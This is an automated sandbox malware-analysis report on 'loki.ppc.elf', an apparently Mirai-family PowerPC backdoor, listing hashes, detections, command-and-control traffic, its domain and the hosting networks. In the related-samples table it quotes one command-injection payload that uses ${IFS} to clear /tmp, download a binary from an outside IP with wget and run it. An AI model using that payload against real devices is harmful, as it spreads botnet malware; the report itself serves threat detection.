Edit tour

Linux Analysis Report
loki.ppc.elf

Overview

General Information

Sample name:loki.ppc.elf
Analysis ID:1594507
MD5:d1cbdd91c6a1e3c22f1b7c397bb0a7bc
SHA1:cd13f71e298b436428a8e056943c2f2a82750ab6
SHA256:565dda6988182ccd8376d7df0dd3af386e78a89b0065f99ea544a4d9d4e1ec36
Tags:elfuser-abuse_ch
Infos:

Detection

Score:48
Range:0 - 100
Whitelisted:false

Signatures

Multi AV Scanner detection for submitted file
Detected TCP or UDP traffic on non-standard ports
Sample has stripped symbol table
Sample listens on a socket
Suricata IDS alerts with low severity for network traffic
Uses the "uname" system call to query kernel version information (possible evasion)

Classification

RansomwareSpreadingPhishingBankerTrojan / BotAdwareSpywareExploiterEvaderMinercleansuspiciousmalicious
Joe Sandbox version:42.0.0 Malachite
Analysis ID:1594507
Start date and time:2025-01-19 03:52:07 +01:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 4m 45s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:defaultlinuxfilecookbook.jbs
Analysis system description:Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:default
Sample name:loki.ppc.elf
Detection:MAL
Classification:mal48.linELF@0/0@1/0
Command:/tmp/loki.ppc.elf
PID:5434
Exit Code:0
Exit Code Info:
Killed:False
Standard Output:
suka
Standard Error:
  • system is lnxubuntu20
  • loki.ppc.elf (PID: 5434, Parent: 5359, MD5: ae65271c943d3451b7f026d1fadccea6) Arguments: /tmp/loki.ppc.elf
  • cleanup
No yara matches
TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2025-01-19T03:52:57.822655+010025000342Misc Attack83.222.191.9013566192.168.2.1342836TCP

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: loki.ppc.elfReversingLabs: Detection: 26%
Source: global trafficTCP traffic: 192.168.2.13:45480 -> 83.222.143.218:13566
Source: global trafficTCP traffic: 192.168.2.13:43424 -> 83.222.152.210:13566
Source: global trafficTCP traffic: 192.168.2.13:56100 -> 83.222.129.82:13566
Source: global trafficTCP traffic: 192.168.2.13:37794 -> 83.222.162.35:13566
Source: global trafficTCP traffic: 192.168.2.13:43684 -> 83.222.77.61:13566
Source: global trafficTCP traffic: 192.168.2.13:35088 -> 83.222.255.25:13566
Source: global trafficTCP traffic: 192.168.2.13:39514 -> 83.222.80.100:13566
Source: global trafficTCP traffic: 192.168.2.13:35214 -> 83.222.63.114:13566
Source: global trafficTCP traffic: 192.168.2.13:33640 -> 83.222.36.180:13566
Source: global trafficTCP traffic: 192.168.2.13:60708 -> 83.222.37.148:13566
Source: global trafficTCP traffic: 192.168.2.13:53760 -> 83.222.206.240:13566
Source: global trafficTCP traffic: 192.168.2.13:39412 -> 83.222.148.57:13566
Source: global trafficTCP traffic: 192.168.2.13:39638 -> 83.222.175.144:13566
Source: global trafficTCP traffic: 192.168.2.13:37540 -> 83.222.112.243:13566
Source: global trafficTCP traffic: 192.168.2.13:54900 -> 83.222.40.150:13566
Source: global trafficTCP traffic: 192.168.2.13:57254 -> 83.222.106.184:13566
Source: global trafficTCP traffic: 192.168.2.13:33838 -> 83.222.113.2:13566
Source: global trafficTCP traffic: 192.168.2.13:56348 -> 83.222.138.242:13566
Source: global trafficTCP traffic: 192.168.2.13:33758 -> 83.222.84.45:13566
Source: global trafficTCP traffic: 192.168.2.13:36824 -> 83.222.21.162:13566
Source: global trafficTCP traffic: 192.168.2.13:48348 -> 83.222.106.20:13566
Source: global trafficTCP traffic: 192.168.2.13:51564 -> 83.222.187.186:13566
Source: global trafficTCP traffic: 192.168.2.13:37752 -> 83.222.120.250:13566
Source: global trafficTCP traffic: 192.168.2.13:53896 -> 83.222.44.157:13566
Source: global trafficTCP traffic: 192.168.2.13:41010 -> 83.222.175.81:13566
Source: global trafficTCP traffic: 192.168.2.13:42486 -> 83.222.49.125:13566
Source: global trafficTCP traffic: 192.168.2.13:46094 -> 83.222.66.197:13566
Source: global trafficTCP traffic: 192.168.2.13:56322 -> 83.222.182.241:13566
Source: global trafficTCP traffic: 192.168.2.13:59254 -> 83.222.85.39:13566
Source: global trafficTCP traffic: 192.168.2.13:37618 -> 83.222.229.126:13566
Source: global trafficTCP traffic: 192.168.2.13:54974 -> 83.222.189.79:13566
Source: global trafficTCP traffic: 192.168.2.13:43248 -> 83.222.54.46:13566
Source: global trafficTCP traffic: 192.168.2.13:60360 -> 83.222.82.192:13566
Source: global trafficTCP traffic: 192.168.2.13:46042 -> 83.222.32.166:13566
Source: global trafficTCP traffic: 192.168.2.13:37920 -> 83.222.237.53:13566
Source: global trafficTCP traffic: 192.168.2.13:32796 -> 83.222.72.87:13566
Source: global trafficTCP traffic: 192.168.2.13:36602 -> 83.222.74.4:13566
Source: global trafficTCP traffic: 192.168.2.13:48868 -> 83.222.17.194:13566
Source: global trafficTCP traffic: 192.168.2.13:51984 -> 83.222.254.61:13566
Source: global trafficTCP traffic: 192.168.2.13:34680 -> 83.222.95.173:13566
Source: global trafficTCP traffic: 192.168.2.13:44624 -> 83.222.143.144:13566
Source: global trafficTCP traffic: 192.168.2.13:44806 -> 83.222.43.209:13566
Source: global trafficTCP traffic: 192.168.2.13:34100 -> 83.222.86.225:13566
Source: global trafficTCP traffic: 192.168.2.13:34360 -> 83.222.194.171:13566
Source: global trafficTCP traffic: 192.168.2.13:35410 -> 83.222.8.167:13566
Source: global trafficTCP traffic: 192.168.2.13:37940 -> 83.222.41.198:13566
Source: global trafficTCP traffic: 192.168.2.13:37922 -> 83.222.247.95:13566
Source: global trafficTCP traffic: 192.168.2.13:36418 -> 83.222.244.73:13566
Source: global trafficTCP traffic: 192.168.2.13:54926 -> 83.222.32.21:13566
Source: global trafficTCP traffic: 192.168.2.13:46276 -> 83.222.239.13:13566
Source: global trafficTCP traffic: 192.168.2.13:58912 -> 83.222.74.56:13566
Source: global trafficTCP traffic: 192.168.2.13:43104 -> 83.222.101.148:13566
Source: global trafficTCP traffic: 192.168.2.13:50650 -> 83.222.60.118:13566
Source: global trafficTCP traffic: 192.168.2.13:53506 -> 83.222.87.58:13566
Source: global trafficTCP traffic: 192.168.2.13:56468 -> 83.222.180.182:13566
Source: global trafficTCP traffic: 192.168.2.13:57750 -> 83.222.232.67:13566
Source: global trafficTCP traffic: 192.168.2.13:39222 -> 83.222.71.19:13566
Source: global trafficTCP traffic: 192.168.2.13:36050 -> 83.222.20.157:13566
Source: global trafficTCP traffic: 192.168.2.13:55966 -> 83.222.244.214:13566
Source: global trafficTCP traffic: 192.168.2.13:42352 -> 83.222.72.253:13566
Source: global trafficTCP traffic: 192.168.2.13:33100 -> 83.222.126.114:13566
Source: global trafficTCP traffic: 192.168.2.13:49972 -> 83.222.195.117:13566
Source: global trafficTCP traffic: 192.168.2.13:53482 -> 83.222.209.183:13566
Source: global trafficTCP traffic: 192.168.2.13:54090 -> 83.222.190.241:13566
Source: global trafficTCP traffic: 192.168.2.13:58102 -> 83.222.204.173:13566
Source: global trafficTCP traffic: 192.168.2.13:33504 -> 83.222.255.23:13566
Source: global trafficTCP traffic: 192.168.2.13:54868 -> 83.222.229.100:13566
Source: global trafficTCP traffic: 192.168.2.13:60878 -> 83.222.171.33:13566
Source: global trafficTCP traffic: 192.168.2.13:58142 -> 83.222.218.2:13566
Source: global trafficTCP traffic: 192.168.2.13:42224 -> 83.222.92.142:13566
Source: global trafficTCP traffic: 192.168.2.13:39946 -> 83.222.185.68:13566
Source: global trafficTCP traffic: 192.168.2.13:54224 -> 83.222.209.0:13566
Source: global trafficTCP traffic: 192.168.2.13:34506 -> 83.222.87.229:13566
Source: global trafficTCP traffic: 192.168.2.13:52768 -> 83.222.157.75:13566
Source: global trafficTCP traffic: 192.168.2.13:45296 -> 83.222.188.229:13566
Source: global trafficTCP traffic: 192.168.2.13:46180 -> 83.222.72.58:13566
Source: global trafficTCP traffic: 192.168.2.13:45092 -> 83.222.87.11:13566
Source: global trafficTCP traffic: 192.168.2.13:60528 -> 83.222.175.41:13566
Source: global trafficTCP traffic: 192.168.2.13:40924 -> 83.222.195.109:13566
Source: global trafficTCP traffic: 192.168.2.13:55062 -> 83.222.26.143:13566
Source: global trafficTCP traffic: 192.168.2.13:33650 -> 83.222.26.25:13566
Source: global trafficTCP traffic: 192.168.2.13:57620 -> 83.222.166.0:13566
Source: global trafficTCP traffic: 192.168.2.13:46276 -> 83.222.125.82:13566
Source: global trafficTCP traffic: 192.168.2.13:38084 -> 83.222.33.88:13566
Source: global trafficTCP traffic: 192.168.2.13:59930 -> 83.222.84.125:13566
Source: global trafficTCP traffic: 192.168.2.13:51128 -> 83.222.230.13:13566
Source: global trafficTCP traffic: 192.168.2.13:47360 -> 83.222.193.184:13566
Source: global trafficTCP traffic: 192.168.2.13:41722 -> 83.222.13.24:13566
Source: global trafficTCP traffic: 192.168.2.13:42836 -> 83.222.191.90:13566
Source: /tmp/loki.ppc.elf (PID: 5434)Socket: 127.0.0.1:14435Jump to behavior
Source: Network trafficSuricata IDS: 2500034 - Severity 2 - ET COMPROMISED Known Compromised or Hostile Host Traffic group 18 : 83.222.191.90:13566 -> 192.168.2.13:42836
Source: unknownTCP traffic detected without corresponding DNS query: 83.222.143.218
Source: unknownTCP traffic detected without corresponding DNS query: 83.222.143.218
Source: unknownTCP traffic detected without corresponding DNS query: 83.222.152.210
Source: unknownTCP traffic detected without corresponding DNS query: 83.222.152.210
Source: unknownTCP traffic detected without corresponding DNS query: 83.222.152.210
Source: unknownTCP traffic detected without corresponding DNS query: 83.222.152.210
Source: unknownTCP traffic detected without corresponding DNS query: 83.222.129.82
Source: unknownTCP traffic detected without corresponding DNS query: 83.222.129.82
Source: unknownTCP traffic detected without corresponding DNS query: 83.222.162.35
Source: unknownTCP traffic detected without corresponding DNS query: 83.222.77.61
Source: unknownTCP traffic detected without corresponding DNS query: 83.222.255.25
Source: unknownTCP traffic detected without corresponding DNS query: 83.222.162.35
Source: unknownTCP traffic detected without corresponding DNS query: 83.222.77.61
Source: unknownTCP traffic detected without corresponding DNS query: 83.222.255.25
Source: unknownTCP traffic detected without corresponding DNS query: 83.222.255.25
Source: unknownTCP traffic detected without corresponding DNS query: 83.222.80.100
Source: unknownTCP traffic detected without corresponding DNS query: 83.222.63.114
Source: unknownTCP traffic detected without corresponding DNS query: 83.222.255.25
Source: unknownTCP traffic detected without corresponding DNS query: 83.222.80.100
Source: unknownTCP traffic detected without corresponding DNS query: 83.222.63.114
Source: unknownTCP traffic detected without corresponding DNS query: 83.222.36.180
Source: unknownTCP traffic detected without corresponding DNS query: 83.222.37.148
Source: unknownTCP traffic detected without corresponding DNS query: 83.222.206.240
Source: unknownTCP traffic detected without corresponding DNS query: 83.222.36.180
Source: unknownTCP traffic detected without corresponding DNS query: 83.222.148.57
Source: unknownTCP traffic detected without corresponding DNS query: 83.222.37.148
Source: unknownTCP traffic detected without corresponding DNS query: 83.222.175.144
Source: unknownTCP traffic detected without corresponding DNS query: 83.222.206.240
Source: unknownTCP traffic detected without corresponding DNS query: 83.222.112.243
Source: unknownTCP traffic detected without corresponding DNS query: 83.222.148.57
Source: unknownTCP traffic detected without corresponding DNS query: 83.222.175.144
Source: unknownTCP traffic detected without corresponding DNS query: 83.222.40.150
Source: unknownTCP traffic detected without corresponding DNS query: 83.222.106.184
Source: unknownTCP traffic detected without corresponding DNS query: 83.222.112.243
Source: unknownTCP traffic detected without corresponding DNS query: 83.222.40.150
Source: unknownTCP traffic detected without corresponding DNS query: 83.222.113.2
Source: unknownTCP traffic detected without corresponding DNS query: 83.222.106.184
Source: unknownTCP traffic detected without corresponding DNS query: 83.222.138.242
Source: unknownTCP traffic detected without corresponding DNS query: 83.222.84.45
Source: unknownTCP traffic detected without corresponding DNS query: 83.222.113.2
Source: unknownTCP traffic detected without corresponding DNS query: 83.222.21.162
Source: unknownTCP traffic detected without corresponding DNS query: 83.222.138.242
Source: unknownTCP traffic detected without corresponding DNS query: 83.222.84.45
Source: unknownTCP traffic detected without corresponding DNS query: 83.222.106.20
Source: unknownTCP traffic detected without corresponding DNS query: 83.222.187.186
Source: unknownTCP traffic detected without corresponding DNS query: 83.222.120.250
Source: unknownTCP traffic detected without corresponding DNS query: 83.222.21.162
Source: unknownTCP traffic detected without corresponding DNS query: 83.222.106.20
Source: unknownTCP traffic detected without corresponding DNS query: 83.222.44.157
Source: unknownTCP traffic detected without corresponding DNS query: 83.222.187.186
Source: global trafficDNS traffic detected: DNS query: secure-network-rebirthltd.ru
Source: ELF static info symbol of initial sample.symtab present: no
Source: classification engineClassification label: mal48.linELF@0/0@1/0
Source: /tmp/loki.ppc.elf (PID: 5434)Queries kernel information via 'uname': Jump to behavior
Source: loki.ppc.elf, 5434.1.000055df3de7f000.000055df3df2f000.rw-.sdmp, loki.ppc.elf, 5436.1.000055df3de7f000.000055df3df0e000.rw-.sdmpBinary or memory string: !/etc/qemu-binfmt/ppc1
Source: loki.ppc.elf, 5434.1.000055df3de7f000.000055df3df2f000.rw-.sdmp, loki.ppc.elf, 5436.1.000055df3de7f000.000055df3df0e000.rw-.sdmpBinary or memory string: /etc/qemu-binfmt/ppc
Source: loki.ppc.elf, 5434.1.00007ffef6a5a000.00007ffef6a7b000.rw-.sdmp, loki.ppc.elf, 5436.1.00007ffef6a5a000.00007ffef6a7b000.rw-.sdmpBinary or memory string: /usr/bin/qemu-ppc
Source: loki.ppc.elf, 5434.1.00007ffef6a5a000.00007ffef6a7b000.rw-.sdmp, loki.ppc.elf, 5436.1.00007ffef6a5a000.00007ffef6a7b000.rw-.sdmpBinary or memory string: x86_64/usr/bin/qemu-ppc/tmp/loki.ppc.elfSUDO_USER=saturninoPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binDISPLAY=:1.0XAUTHORITY=/run/user/1000/gdm/XauthoritySUDO_UID=1000TERM=xterm-256colorCOLORTERM=truecolorLOGNAME=rootUSER=rootLANG=en_US.UTF-8SUDO_COMMAND=/bin/bashHOME=/rootMAIL=/var/mail/rootSUDO_GID=1000SHELL=/bin/bash/tmp/loki.ppc.elf
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management InstrumentationPath InterceptionPath InterceptionDirect Volume AccessOS Credential Dumping11
Security Software Discovery
Remote ServicesData from Local System1
Non-Standard Port
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsRootkitLSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media1
Non-Application Layer Protocol
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive1
Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
No configs have been found
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Number of created Files
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1594507 Sample: loki.ppc.elf Startdate: 19/01/2025 Architecture: LINUX Score: 48 13 83.222.162.35, 13566, 37794 WAVENETLB Bulgaria 2->13 15 83.222.125.82, 13566, 46276 TRI-ASTrueRecordsIncES Russian Federation 2->15 17 87 other IPs or domains 2->17 19 Multi AV Scanner detection for submitted file 2->19 7 loki.ppc.elf 2->7         started        signatures3 process4 process5 9 loki.ppc.elf 7->9         started        11 loki.ppc.elf 7->11         started       

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
loki.ppc.elf26%ReversingLabsLinux.Backdoor.Mirai
No Antivirus matches
No Antivirus matches
No Antivirus matches

Download Network PCAP: filteredfull

NameIPActiveMaliciousAntivirus DetectionReputation
secure-network-rebirthltd.ru
83.222.191.90
truefalse
    high
    • No. of IPs < 25%
    • 25% < No. of IPs < 50%
    • 50% < No. of IPs < 75%
    • 75% < No. of IPs
    IPDomainCountryFlagASNASN NameMalicious
    83.222.26.143
    unknownRussian Federation
    25532MASTERHOST-ASMoscowRussiaRUfalse
    83.222.193.184
    unknownRussian Federation
    6854SYNTERRA-ASRUfalse
    83.222.21.162
    unknownRussian Federation
    25532MASTERHOST-ASMoscowRussiaRUfalse
    83.222.112.243
    unknownRussian Federation
    42632MNOGOBYTE-ASMoscowRussiaRUfalse
    83.222.86.225
    unknownRussian Federation
    16285ASN-UMNTechnicheskayaStr18bYekaterinburgRussiaRUfalse
    83.222.71.19
    unknownRussian Federation
    16285ASN-UMNTechnicheskayaStr18bYekaterinburgRussiaRUfalse
    83.222.63.114
    unknownLuxembourg
    8632LOL-ASluLUfalse
    83.222.138.242
    unknownSwitzerland
    31736SENSELAN-ASsenseLANGmbHCHfalse
    83.222.185.68
    unknownBulgaria
    43561NET1-ASBGfalse
    83.222.129.82
    unknownSwitzerland
    31736SENSELAN-ASsenseLANGmbHCHfalse
    83.222.204.173
    unknownRussian Federation
    6854SYNTERRA-ASRUfalse
    83.222.143.144
    unknownSwitzerland
    31736SENSELAN-ASsenseLANGmbHCHfalse
    83.222.44.157
    unknownLuxembourg
    8632LOL-ASluLUfalse
    83.222.244.73
    unknownUnited Kingdom
    13768COGECO-PEER1CAfalse
    83.222.187.186
    unknownBulgaria
    43561NET1-ASBGfalse
    83.222.195.109
    unknownRussian Federation
    6854SYNTERRA-ASRUfalse
    83.222.84.45
    unknownRussian Federation
    16285ASN-UMNTechnicheskayaStr18bYekaterinburgRussiaRUfalse
    83.222.188.229
    unknownBulgaria
    43561NET1-ASBGfalse
    83.222.255.25
    unknownUnited Kingdom
    13768COGECO-PEER1CAfalse
    83.222.255.23
    unknownUnited Kingdom
    13768COGECO-PEER1CAfalse
    83.222.92.142
    unknownRussian Federation
    16285ASN-UMNTechnicheskayaStr18bYekaterinburgRussiaRUfalse
    83.222.60.118
    unknownLuxembourg
    8632LOL-ASluLUfalse
    83.222.84.125
    unknownRussian Federation
    16285ASN-UMNTechnicheskayaStr18bYekaterinburgRussiaRUfalse
    83.222.101.148
    unknownRussian Federation
    42632MNOGOBYTE-ASMoscowRussiaRUfalse
    83.222.74.4
    unknownRussian Federation
    16285ASN-UMNTechnicheskayaStr18bYekaterinburgRussiaRUfalse
    83.222.237.53
    unknownUnited Kingdom
    13768COGECO-PEER1CAfalse
    83.222.190.241
    unknownBulgaria
    43561NET1-ASBGfalse
    83.222.189.79
    unknownBulgaria
    43561NET1-ASBGfalse
    83.222.32.21
    unknownLuxembourg
    8632LOL-ASluLUfalse
    83.222.244.214
    unknownUnited Kingdom
    13768COGECO-PEER1CAfalse
    83.222.175.144
    unknownBulgaria
    12615GCN-ASGCNAD-SofiaBulgariaBGfalse
    83.222.74.56
    unknownRussian Federation
    16285ASN-UMNTechnicheskayaStr18bYekaterinburgRussiaRUfalse
    83.222.229.126
    unknownUnited Kingdom
    13768COGECO-PEER1CAfalse
    83.222.49.125
    unknownLuxembourg
    8632LOL-ASluLUfalse
    83.222.95.173
    unknownRussian Federation
    16285ASN-UMNTechnicheskayaStr18bYekaterinburgRussiaRUfalse
    83.222.209.183
    unknownRussian Federation
    6854SYNTERRA-ASRUfalse
    83.222.80.100
    unknownRussian Federation
    16285ASN-UMNTechnicheskayaStr18bYekaterinburgRussiaRUfalse
    83.222.175.81
    unknownBulgaria
    12615GCN-ASGCNAD-SofiaBulgariaBGfalse
    83.222.26.25
    unknownRussian Federation
    25532MASTERHOST-ASMoscowRussiaRUfalse
    83.222.247.95
    unknownUnited Kingdom
    13768COGECO-PEER1CAfalse
    83.222.87.229
    unknownRussian Federation
    16285ASN-UMNTechnicheskayaStr18bYekaterinburgRussiaRUfalse
    83.222.175.41
    unknownBulgaria
    12615GCN-ASGCNAD-SofiaBulgariaBGfalse
    83.222.152.210
    unknownSwitzerland
    31736SENSELAN-ASsenseLANGmbHCHfalse
    83.222.166.0
    unknownBulgaria
    12615GCN-ASGCNAD-SofiaBulgariaBGfalse
    83.222.157.75
    unknownSwitzerland
    31736SENSELAN-ASsenseLANGmbHCHfalse
    83.222.126.114
    unknownRussian Federation
    47328TRI-ASTrueRecordsIncESfalse
    83.222.171.33
    unknownBulgaria
    12615GCN-ASGCNAD-SofiaBulgariaBGfalse
    83.222.148.57
    unknownSwitzerland
    31736SENSELAN-ASsenseLANGmbHCHfalse
    83.222.40.150
    unknownLuxembourg
    8632LOL-ASluLUfalse
    83.222.206.240
    unknownRussian Federation
    6854SYNTERRA-ASRUfalse
    83.222.72.87
    unknownRussian Federation
    16285ASN-UMNTechnicheskayaStr18bYekaterinburgRussiaRUfalse
    83.222.209.0
    unknownRussian Federation
    6854SYNTERRA-ASRUfalse
    83.222.180.182
    unknownBulgaria
    205872EXTRANET-ASBGfalse
    83.222.33.88
    unknownLuxembourg
    8632LOL-ASluLUfalse
    83.222.254.61
    unknownUnited Kingdom
    13768COGECO-PEER1CAfalse
    83.222.43.209
    unknownLuxembourg
    8632LOL-ASluLUfalse
    83.222.85.39
    unknownRussian Federation
    16285ASN-UMNTechnicheskayaStr18bYekaterinburgRussiaRUfalse
    83.222.194.171
    unknownRussian Federation
    6854SYNTERRA-ASRUfalse
    83.222.41.198
    unknownLuxembourg
    8632LOL-ASluLUfalse
    83.222.77.61
    unknownRussian Federation
    16285ASN-UMNTechnicheskayaStr18bYekaterinburgRussiaRUfalse
    83.222.66.197
    unknownRussian Federation
    16285ASN-UMNTechnicheskayaStr18bYekaterinburgRussiaRUfalse
    83.222.87.58
    unknownRussian Federation
    16285ASN-UMNTechnicheskayaStr18bYekaterinburgRussiaRUfalse
    83.222.8.167
    unknownRussian Federation
    25532MASTERHOST-ASMoscowRussiaRUfalse
    83.222.87.11
    unknownRussian Federation
    16285ASN-UMNTechnicheskayaStr18bYekaterinburgRussiaRUfalse
    83.222.230.13
    unknownUnited Kingdom
    13768COGECO-PEER1CAfalse
    83.222.113.2
    unknownRussian Federation
    42632MNOGOBYTE-ASMoscowRussiaRUfalse
    83.222.232.67
    unknownUnited Kingdom
    13768COGECO-PEER1CAfalse
    83.222.120.250
    unknownRussian Federation
    42632MNOGOBYTE-ASMoscowRussiaRUfalse
    83.222.37.148
    unknownLuxembourg
    8632LOL-ASluLUfalse
    83.222.32.166
    unknownLuxembourg
    8632LOL-ASluLUfalse
    83.222.36.180
    unknownLuxembourg
    8632LOL-ASluLUfalse
    83.222.191.90
    secure-network-rebirthltd.ruBulgaria
    43561NET1-ASBGfalse
    83.222.125.82
    unknownRussian Federation
    47328TRI-ASTrueRecordsIncESfalse
    83.222.13.24
    unknownRussian Federation
    25532MASTERHOST-ASMoscowRussiaRUfalse
    83.222.72.253
    unknownRussian Federation
    16285ASN-UMNTechnicheskayaStr18bYekaterinburgRussiaRUfalse
    83.222.182.241
    unknownBulgaria
    205872EXTRANET-ASBGfalse
    83.222.218.2
    unknownRussian Federation
    25159SONICDUO-ASRUfalse
    83.222.106.20
    unknownRussian Federation
    42632MNOGOBYTE-ASMoscowRussiaRUfalse
    83.222.72.58
    unknownRussian Federation
    16285ASN-UMNTechnicheskayaStr18bYekaterinburgRussiaRUfalse
    83.222.106.184
    unknownRussian Federation
    42632MNOGOBYTE-ASMoscowRussiaRUfalse
    83.222.229.100
    unknownUnited Kingdom
    13768COGECO-PEER1CAfalse
    83.222.162.35
    unknownBulgaria
    31037WAVENETLBfalse
    83.222.195.117
    unknownRussian Federation
    6854SYNTERRA-ASRUfalse
    83.222.54.46
    unknownLuxembourg
    8632LOL-ASluLUfalse
    83.222.20.157
    unknownRussian Federation
    25532MASTERHOST-ASMoscowRussiaRUfalse
    83.222.239.13
    unknownUnited Kingdom
    13768COGECO-PEER1CAfalse
    83.222.17.194
    unknownRussian Federation
    25532MASTERHOST-ASMoscowRussiaRUfalse
    83.222.143.218
    unknownSwitzerland
    31736SENSELAN-ASsenseLANGmbHCHfalse
    83.222.82.192
    unknownRussian Federation
    16285ASN-UMNTechnicheskayaStr18bYekaterinburgRussiaRUfalse
    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
    83.222.185.68Tyltvc4Yuk.elfGet hashmaliciousMiraiBrowse
    • /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://193.23.55.21/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
    83.222.21.162Kloki.arm7.elfGet hashmaliciousMiraiBrowse
      83.222.255.25loki.i686.elfGet hashmaliciousUnknownBrowse
        83.222.63.114Kloki.arm4.elfGet hashmaliciousUnknownBrowse
          83.222.84.45Kloki.arm5.elfGet hashmaliciousUnknownBrowse
            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
            secure-network-rebirthltd.ruKloki.arm4.elfGet hashmaliciousUnknownBrowse
            • 83.222.191.90
            Kloki.m68k.elfGet hashmaliciousUnknownBrowse
            • 83.222.191.90
            Kloki.i686.elfGet hashmaliciousUnknownBrowse
            • 83.222.191.90
            loki.x86.elfGet hashmaliciousUnknownBrowse
            • 83.222.191.90
            Kloki.mips.elfGet hashmaliciousUnknownBrowse
            • 83.222.191.90
            loki.mips.elfGet hashmaliciousUnknownBrowse
            • 83.222.191.90
            Kloki.sh4.elfGet hashmaliciousUnknownBrowse
            • 83.222.191.90
            loki.arm7.elfGet hashmaliciousMiraiBrowse
            • 83.222.191.90
            Kloki.i486.elfGet hashmaliciousUnknownBrowse
            • 83.222.191.90
            Kloki.ppc.elfGet hashmaliciousUnknownBrowse
            • 83.222.191.90
            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
            MASTERHOST-ASMoscowRussiaRUKloki.arm4.elfGet hashmaliciousUnknownBrowse
            • 83.222.8.97
            Kloki.m68k.elfGet hashmaliciousUnknownBrowse
            • 83.222.20.238
            Kloki.i686.elfGet hashmaliciousUnknownBrowse
            • 83.222.23.89
            loki.x86.elfGet hashmaliciousUnknownBrowse
            • 83.222.23.89
            Kloki.mips.elfGet hashmaliciousUnknownBrowse
            • 83.222.31.69
            loki.mips.elfGet hashmaliciousUnknownBrowse
            • 83.222.9.65
            Kloki.sh4.elfGet hashmaliciousUnknownBrowse
            • 83.222.28.56
            loki.arm7.elfGet hashmaliciousMiraiBrowse
            • 83.222.9.29
            Kloki.i486.elfGet hashmaliciousUnknownBrowse
            • 83.222.15.96
            Kloki.ppc.elfGet hashmaliciousUnknownBrowse
            • 83.222.17.204
            SYNTERRA-ASRUKloki.arm4.elfGet hashmaliciousUnknownBrowse
            • 83.222.207.75
            Kloki.m68k.elfGet hashmaliciousUnknownBrowse
            • 83.222.192.22
            Kloki.i686.elfGet hashmaliciousUnknownBrowse
            • 83.222.204.106
            loki.x86.elfGet hashmaliciousUnknownBrowse
            • 83.222.204.106
            Kloki.mips.elfGet hashmaliciousUnknownBrowse
            • 83.222.210.211
            loki.mips.elfGet hashmaliciousUnknownBrowse
            • 83.222.195.162
            Kloki.sh4.elfGet hashmaliciousUnknownBrowse
            • 83.222.195.159
            loki.arm7.elfGet hashmaliciousMiraiBrowse
            • 83.222.196.148
            Kloki.i486.elfGet hashmaliciousUnknownBrowse
            • 83.222.194.13
            Kloki.ppc.elfGet hashmaliciousUnknownBrowse
            • 83.222.195.110
            MASTERHOST-ASMoscowRussiaRUKloki.arm4.elfGet hashmaliciousUnknownBrowse
            • 83.222.8.97
            Kloki.m68k.elfGet hashmaliciousUnknownBrowse
            • 83.222.20.238
            Kloki.i686.elfGet hashmaliciousUnknownBrowse
            • 83.222.23.89
            loki.x86.elfGet hashmaliciousUnknownBrowse
            • 83.222.23.89
            Kloki.mips.elfGet hashmaliciousUnknownBrowse
            • 83.222.31.69
            loki.mips.elfGet hashmaliciousUnknownBrowse
            • 83.222.9.65
            Kloki.sh4.elfGet hashmaliciousUnknownBrowse
            • 83.222.28.56
            loki.arm7.elfGet hashmaliciousMiraiBrowse
            • 83.222.9.29
            Kloki.i486.elfGet hashmaliciousUnknownBrowse
            • 83.222.15.96
            Kloki.ppc.elfGet hashmaliciousUnknownBrowse
            • 83.222.17.204
            No context
            No context
            No created / dropped files found
            File type:ELF 32-bit MSB executable, PowerPC or cisco 4500, version 1 (SYSV), statically linked, stripped
            Entropy (8bit):6.189240208223776
            TrID:
            • ELF Executable and Linkable format (generic) (4004/1) 100.00%
            File name:loki.ppc.elf
            File size:46'968 bytes
            MD5:d1cbdd91c6a1e3c22f1b7c397bb0a7bc
            SHA1:cd13f71e298b436428a8e056943c2f2a82750ab6
            SHA256:565dda6988182ccd8376d7df0dd3af386e78a89b0065f99ea544a4d9d4e1ec36
            SHA512:55104ba1d6e1c4b08a583c28f2d7f4ac796fbeddf5c8fbd42e267e8dc172d3e8622e397c021c86ebde437b6c8c1c23f0cb9105463fe9b3b34ad6d153595330f6
            SSDEEP:768:JmzroEN8npRpJeDVEjiowCvDXFzkUsgAoPKzfQMty/ZbIITm3wVvR:UnoEKpIZCV/jRkr1oOQMt4bImm3evR
            TLSH:B4235D42721C0A57D4A75AB0393F56E083FEA9A030F4F688251F9B5A8275F3611C2FDE
            File Content Preview:.ELF...........................4.........4. ...(.......................................................T............dt.Q.............................!..|......$H...H..a...$8!. |...N.. .!..|.......?.............../...@..\?........+../...A..$8...})......N..

            ELF header

            Class:ELF32
            Data:2's complement, big endian
            Version:1 (current)
